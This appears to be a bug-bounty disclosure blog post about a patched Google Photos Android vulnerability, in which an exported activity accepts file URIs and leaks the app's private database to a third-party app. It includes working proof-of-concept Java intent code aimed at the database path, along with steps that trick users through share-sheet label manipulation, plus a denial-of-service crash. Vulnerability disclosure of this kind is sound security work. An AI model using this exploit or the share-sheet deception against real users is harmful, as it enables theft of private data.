My Post 3
Posted on by Editorial Team

Google Photos : Theft of Database & Arbitrary Files Android Vulnerability

Google Photos android app’s activity com.google.android.apps.photos.pager.HostPhotoPagerActivity has set to exported with intent filter has file scheme support which means third party app could use this exported activity to pass file from file uri without access validation.

Impact :

  1. This could have allowed attacker to steal sensitive info including Google Photos database and other sandbox files.
  2. This could have DOS on conversation module of google photos which causes permanent denial of service.
App Detail:
details_version_vulnerabledetails_version_patcheddetails_installs
≤ 5.33.0.3629785735.36.0.3658953655 Billion +
Click here to Watch POC

Steps to reproduce :

  1. Compile and run apk using below intent:
StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
StrictMode.setVmPolicy(builder.build()); 

Uri uri = Uri.parse("file:///data/data/com.google.android.apps.photos/databases/gphotos0.db"); 

Intent intent = new Intent("android.intent.action.SEND");
intent.setClassName("com.google.android.apps.photos", "com.google.android.apps.photos.pager.HostPhotoPagerActivity");
intent.setDataAndType(uri, "image/*");
startActivity(intent);

Toast.makeText(this, "Click On Share and Select iPhotos", Toast.LENGTH_LONG).show();

2. Upon apk run, it will show media preview in Google Photos with toast (Click On Share and Select iPhotos) from attackers app.

3. In bottom sheet of SHARE TO APPS select more now here we will get attackers app (iPhotos) (using android:label=”aaaaaaa” kind of trick in intent-filter we can priorities our app in share sheet).

4. After selecting app, database will be sent to attackers app. (Which includes remote media, envelopes, backup, local media and other information)

In other way if victim choose email then image.jpg (Google photos rename any file with any extension to image.jpg) file will be attached to email and here victim didn’t think about malicious because of file name.

Other impact :

There is an option to share file with google contacts in google photos conversation, if victim select contact then app get crash with exception “lsy: java.lang.IllegalArgumentException: baseUrl is not a fife Url” and complete conversation module goes in permanent denial of service(DoS).

Timeline :

Mar 20, 2021 : Created issue ticket

Mar 23, 2021: 🎉 Nice catch!

Apr 2, 2021: Reward of $ 1337

Proof of concept :

Watch in 750P for better visibility